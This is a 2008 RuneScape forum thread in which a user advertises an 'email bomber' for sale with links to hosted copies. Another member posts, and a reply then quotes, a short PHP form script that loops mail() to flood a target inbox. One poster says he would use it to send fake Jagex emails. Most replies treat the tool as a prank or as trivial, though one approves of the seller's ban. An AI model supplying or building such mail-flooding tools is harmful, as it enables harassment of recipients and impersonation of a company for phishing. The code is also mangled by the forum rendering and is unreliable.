Evony Guides and Help
Trik Forum - RuneScape Forum  
Register Forum Homepage Members Mark Forums Read


Trik Members: 34,705 | Total Posts: 134,006 | Total Threads: 25,847
Welcome to our newest member, ahr1mz.
Go Back   Trik Forum - RuneScape Forum > Off-Topic > General Discussion
Reload this Page My email Bomber!
General Discussion Feel free to talk about anything and everything in here.


Reply
 
Thread Tools Display Modes
My email Bomber!
Old
  (#1)
sayin21 is Offline
Banned
sayin21 is an unknown quantity at this point
 
Posts: 32
Join Date: May 2008
   
Default My email Bomber! - 07-22-2008, 12:29 PM

This is my email bomber.

I will be selling the script and templates with it.


Here are the version.
There are 2 different templates.

Choose one and book mark it!

Both do same thing!

Main site: Ibomb-email.co.cc

V1: http://www.sierri.net/bbombb/ibomb/
V2: http://www.sierri.net/bbombb/
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#2)
hallydude is Offline
$5+ Donor
hallydude is on a distinguished road
 
hallydude's Avatar
 
Posts: 611
Join Date: Dec 2007
Location: Ontario, Canada FTW
  Send a message via MSN to hallydude  
Default Re: My email Bomber! - 07-22-2008, 03:54 PM

I just tested, amazing. the only word to describe it is amazing. Sends instantly

One problem though, try to make it able to send mroe than 100 emails at a time.




Respect List
Relent
God
h011yw00d
mercyless
S3x


spit_fire9@msn.com
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#3)
Jetfirehack is Offline
Private
Jetfirehack is an unknown quantity at this point
 
Posts: 18
Join Date: Jul 2008
   
Default Re: My email Bomber! - 07-22-2008, 05:04 PM

Yeah it's awesome until Hotmail and other services block emails from your server

EDIT:
I tested it on my Hotmail email, no emails arrived. LOL!
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#4)
sayin21 is Offline
Banned
sayin21 is an unknown quantity at this point
 
Posts: 32
Join Date: May 2008
   
Default Re: My email Bomber! - 07-22-2008, 05:45 PM

It sends more than 100000!

Jet! It comes but slowly.
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#5)
MrHax is Offline
Sergeant
MrHax is an unknown quantity at this point
 
Posts: 294
Join Date: Jul 2007
   
Default Re: My email Bomber! - 07-23-2008, 06:28 AM

How much are you looking for it? If you want, i can verify it for selling.


I had no signature until now
Quote:
Originally Posted by Chester View Post
These pictures are really old.
I actually find andrew gower attractive so stfu. :]

Currently making Official Trik.com Browser! Loads of features etc for Rs & stuff.
Base - 100% done.
Tools - 0% done. - To be done tonight. (4:30pm GMT, Wednesday, July 16th, 200
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#6)
sayin21 is Offline
Banned
sayin21 is an unknown quantity at this point
 
Posts: 32
Join Date: May 2008
   
Default Re: My email Bomber! - 07-23-2008, 06:33 AM

MrHax, whats ur msn. Il send files right away.

So u can verify.
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#7)
Trikster is Offline
Lieutenant
Trikster is an unknown quantity at this point
 
Posts: 387
Join Date: Nov 2007
Location: Enterprise, Alabama
  Send a message via MSN to Trikster  
Default Re: My email Bomber! - 07-24-2008, 08:43 PM

How is this awesome? It's the most simple PHP script ever.

PHP Code:
<?php

    
if ($_POST['submit'] == 'Bomb')
    
    {
    
        
$to $_POST['to'];
        
$subject $_POST['subject'];
        
$message $_POST['message'];
        
$length $_POST['amount'];
        
        if (isset(
$to) && isset($subject) && isset($message) && isset($length))
        
        {
        
            for(
$i 0$i <= $length$i++)
            
            {
            
                
mail($to$subject$message);
                
            }
            
        }
        
        else
        
        {
        
            die(
"Please fill in all the fields");
            
        }
        
    }
    
?>

<html>
    <html>
        <style type="text/css" media="all">
            html {
                color: #000;
                background: #fff;
            }
            
            table td:first-child {
                text-align: right;
                font-weight: bold;
            }
        </style>
    </html>
    <body>
        <table>
            <tr>
                <td>To</td>
                <td><input type="text" name="to"></td>
            </tr>
            <tr>
                <td>Subject</td>
                <td><input type="text" name="subject"></td>
            </tr>
            <tr>
                <td>Amount</td>
                <td><input type="text" name="amount"></td></tr>
            <tr>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
            </tr>
            <tr>
                <td>Message</td>
                <td><textarea cols="40" rows=8" name="message"></textarea></td>
            </tr>
            <tr>
                <td>&nbsp;</td>
                <td><input type="submit" name="submit" value="Bomb"></td>
            </tr>
        </table>
    </body>
</html>>



  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#8)
sayin21 is Offline
Banned
sayin21 is an unknown quantity at this point
 
Posts: 32
Join Date: May 2008
   
Default Re: My email Bomber! - 07-25-2008, 09:05 AM

Quote:
Originally Posted by Trikster View Post
How is this awesome? It's the most simple PHP script ever.

PHP Code:
<?php

    
if ($_POST['submit'] == 'Bomb')
    
    {
    
        
$to $_POST['to'];
        
$subject $_POST['subject'];
        
$message $_POST['message'];
        
$length $_POST['amount'];
        
        if (isset(
$to) && isset($subject) && isset($message) && isset($length))
        
        {
        
            for(
$i 0$i <= $length$i++)
            
            {
            
                
mail($to$subject$message);
                
            }
            
        }
        
        else
        
        {
        
            die(
"Please fill in all the fields");
            
        }
        
    }
    
?>

<html>
    <html>
        <style type="text/css" media="all">
            html {
                color: #000;
                background: #fff;
            }
            
            table td:first-child {
                text-align: right;
                font-weight: bold;
            }
        </style>
    </html>
    <body>
        <table>
            <tr>
                <td>To</td>
                <td><input type="text" name="to"></td>
            </tr>
            <tr>
                <td>Subject</td>
                <td><input type="text" name="subject"></td>
            </tr>
            <tr>
                <td>Amount</td>
                <td><input type="text" name="amount"></td></tr>
            <tr>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
            </tr>
            <tr>
                <td>Message</td>
                <td><textarea cols="40" rows=8" name="message"></textarea></td>
            </tr>
            <tr>
                <td>&nbsp;</td>
                <td><input type="submit" name="submit" value="Bomb"></td>
            </tr>
        </table>
    </body>
</html>>
Doesnt work. But nice try tho. :P
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#9)
X Phisher X is Offline
Private
X Phisher X is an unknown quantity at this point
 
Posts: 12
Join Date: Jul 2008
   
Default Re: My email Bomber! - 07-28-2008, 06:17 AM

Why are you banned?

Also, very nice I would use to send fake @Jagex.com emails!
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#10)
Teh God is Offline
Trik.com news editor
Teh God is an unknown quantity at this point
 
Posts: 368
Join Date: Jun 2008
Location: In the shadows WATCHING
   
Default Re: My email Bomber! - 07-28-2008, 09:12 AM

They both have been copy n pasted and are easy to make -.- GOOD YOUR BANNED.




I AM MMING FOR FREE limited time only.

Previously Known as: Xx b4r3g3r x


^^>>VOUCH THREAD<<^^
I love SonicLink and his big juicy cock. - Tagged by soniclink
  
Reply With Quote Share with Facebook
Re: My email Bomber!
Old
  (#11)
X Phisher X is Offline
Private
X Phisher X is an unknown quantity at this point
 
Posts: 12
Join Date: Jul 2008
   
Default Re: My email Bomber! - 07-28-2008, 03:02 PM

Wait how is it good he is banned. What do you mean copy and pasted?
  
Reply With Quote Share with Facebook
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off





======================================================================================== ---------------------------------------------------------------------------------------- ========================================================================================

Your Ad Here

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Copyright © Trik.com